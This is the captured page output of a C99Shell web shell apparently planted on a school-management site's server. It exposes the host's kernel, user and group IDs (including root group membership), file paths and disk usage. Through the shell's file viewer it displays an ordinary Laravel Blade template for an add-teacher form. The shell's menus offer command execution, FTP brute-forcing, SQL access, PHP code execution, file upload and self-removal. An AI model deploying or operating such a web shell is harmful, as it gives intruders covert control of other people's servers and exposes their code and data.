!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/admin/teacher/   drwxr-xr-x
Free 29.34 GB of 117.98 GB (24.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     add_teacher.blade.php (8.69 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="eForm-layouts">
    <form method="POST" enctype="multipart/form-data" class="d-block ajaxForm" action="{{ route('admin.teacher.create') }}">
        @csrf
        <div class="form-row">
            <div class="fpb-7">
                <label for="name" class="eForm-label">{{ get_phrase('Name') }}</label>
                <input type="text" class="form-control eForm-control" id="name" name = "name" required>
            </div>

            <div class="fpb-7">
                <label for="email" class="eForm-label">{{ get_phrase('Email') }}</label>
                <input type="email" class="form-control eForm-control" id="email" name = "email" required>
            </div>

            <div class="fpb-7">
                <label for="password" class="eForm-label">{{ get_phrase('Password') }}</label>
                <input type="password" class="form-control eForm-control" id="password" name = "password" placeholder="Provide teacher password" required>
            </div>

            <div class="fpb-7">
                <label for="department_id" class="eForm-label">{{ get_phrase("Department") }}</label>
                <select name="department_id" id="department_id" class="form-select eForm-select eChoice-multiple-with-remove" required>
                    <option value="">{{ get_phrase("Select a department") }}</option>
                    @foreach($departments as $department)
                        <option value="{{ $department->id }}">{{ $department->name }}</option>
                    @endforeach
                </select>
            </div>

            <div class="fpb-7">
                <label for="designation" class="eForm-label">{{ get_phrase('Designation') }}</label>
                <select name="designation"  class="form-select eForm-select eChoice-multiple-with-remove selectDesignation">
                    <option value="">{{ get_phrase("Select a designation") }}</option>
                    @foreach($designations as $designation)
                        <option value="{{ $designation }}">{{ ucwords(str_replace('_', ' ', $designation)) }}</option>
                    @endforeach
                </select>
            </div>
            <div class="fpb-7 sub-designation-sec d-none" id="sub-designation-form">
                <label for="designation" class="eForm-label">{{ get_phrase('Sub Designation') }}</label>
                <select name="sub_designation"  class="form-select eForm-select eChoice-multiple-with-remove selectDesignation">
                    <option value="">{{ get_phrase("Select a designation") }}</option>
                    @foreach($sub_designations as $sub_designation)
                        <option value="{{ $sub_designation }}">{{ ucwords(str_replace('_', ' ', $sub_designation)) }}</option>

                    @endforeach
                </select>
            </div>

            <div class="fpb-7">
                <label class="eForm-label">{{ get_phrase('NID No') }}<span class="required"></span></label>
                <input type="number" class="form-control eForm-control" name="nid_no" placeholder="{{ get_phrase('Enter NID No') }}" />
            </div>



            <div class="fpb-7">
                <label class="eForm-label">{{ get_phrase('Educational Qualification') }}<span class="required"></span></label>
                <input type="text"  class="form-control eForm-control" name="educational_qualification" placeholder="{{ get_phrase('Educational Qualification') }}" />
            </div>


            <div class="fpb-7">
                <label class="eForm-label">{{ get_phrase('Training') }}<span class="required"></span></label>
                <input type="text"  class="form-control eForm-control" name="training" placeholder="{{ get_phrase('Enter training information') }}" />
            </div>


            <div class="fpb-7">
                <label for="join_date" class="eForm-label">{{ get_phrase('Date of Joining') }}<span class="required"></span></label>
                <input type="text" class="form-control eForm-control join_date" id="join_date" name="join_date" value="{{ date('m/d/Y') }}" />
            </div>


            <div class="fpb-7">
                <label for="birthday" class="eForm-label">{{ get_phrase('Birthday') }}<span class="required"></span></label>
                <input type="text" class="form-control eForm-control inputDate" id="birthday" name="birthday" value="{{ date('m/d/Y') }}" />
            </div>

            <div class="fpb-7">
                <label for="gender" class="eForm-label">{{ get_phrase('Gender') }}</label>
                <select name="gender" id="gender" class="form-select eForm-select eChoice-multiple-with-remove"  required>
                    <option value="">{{ get_phrase('Select gender') }}</option>
                    <option value="Male">{{ get_phrase('Male') }}</option>
                    <option value="Female">{{ get_phrase('Female') }}</option>
                    <option value="Others">{{ get_phrase('Others') }}</option>
                </select>
            </div>

            <div class="fpb-7">
                <label for="phone" class="eForm-label">{{ get_phrase('Phone number') }}</label>
                <input type="text" class="form-control eForm-control" id="phone" name = "phone" required>
            </div>

            <div class="fpb-7">
                <label for="blood_group" class="eForm-label">{{ get_phrase('Blood group') }}</label>
                <select name="blood_group" id="blood_group" class="form-select eForm-select eChoice-multiple-with-remove">
                    <option value="">{{ get_phrase('Select a blood group') }}</option>
                    <option value="a+">{{ get_phrase('A+') }}</option>
                    <option value="a-">{{ get_phrase('A-') }}</option>
                    <option value="b+">{{ get_phrase('B+') }}</option>
                    <option value="b-">{{ get_phrase('B-') }}</option>
                    <option value="ab+">{{ get_phrase('AB+') }}</option>
                    <option value="ab-">{{ get_phrase('AB-') }}</option>
                    <option value="o+">{{ get_phrase('O+') }}</option>
                    <option value="o-">{{ get_phrase('O-') }}</option>
                </select>
            </div>


            <div class="fpb-7">
                <label for="designation" class="eForm-label">{{ get_phrase('First Joining') }}</label>
                <select name="first_join"  class="form-select eForm-select eChoice-multiple-with-remove" required>
                    <option value="">{{ get_phrase("Select a first joining") }}</option>
                    @foreach($designations as $designation)
                        <option value="{{ $designation }}">{{ ucwords(str_replace('_', ' ', $designation)) }}</option>
                    @endforeach
                </select>
            </div>

            <div class="fpb-7">
                <label for="phone" class="eForm-label">{{ get_phrase('Address') }}</label>
                <textarea class="form-control eForm-control" id="address" name="address" rows="5" placeholder="Provide teacher address" required></textarea>
            </div>

            <div class="fpb-7">
              <label for="formFile" class="eForm-label"
                >{{ get_phrase('Photo') }}</label
              >
              <input
                class="form-control eForm-control-file"
                id="photo" name="photo" accept="image/*"
                type="file" required
              />
            </div>

            <div class="fpb-7 pt-2">
                <button class="btn-form" type="submit">{{ get_phrase('Create') }}</button>
            </div>
        </div>
    </form>
</div>

<script type="text/javascript">
    "use strict";
    $(document).ready(function () {
      $(".eChoice-multiple-with-remove").select2();
    });

    $(function () {
      $('.inputDate').daterangepicker(
        {
          singleDatePicker: true,
          showDropdowns: true,
          minYear: 1901,
          maxYear: parseInt(moment().format("YYYY"), 10),
        },
        function (start, end, label) {
          var years = moment().diff(start, "years");
        }
      );
    });
    $(function () {
      $('.join_date').daterangepicker(
        {
          singleDatePicker: true,
          showDropdowns: true,
          minYear: 1901,
          maxYear: parseInt(moment().format("YYYY"), 10),
        },
        function (start, end, label) {
          var years = moment().diff(start, "years");
        }
      );

    $(document).on('change', '.selectDesignation',function(e){
        const type=$(this).val();
        console.log(type);
    if(type=='officer_employee'){
        if ($('#sub-designation-form').hasClass('sub-designation-sec')) {
            $('#sub-designation-form').removeClass("d-none");
        }
    }
    });

});
</script>



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--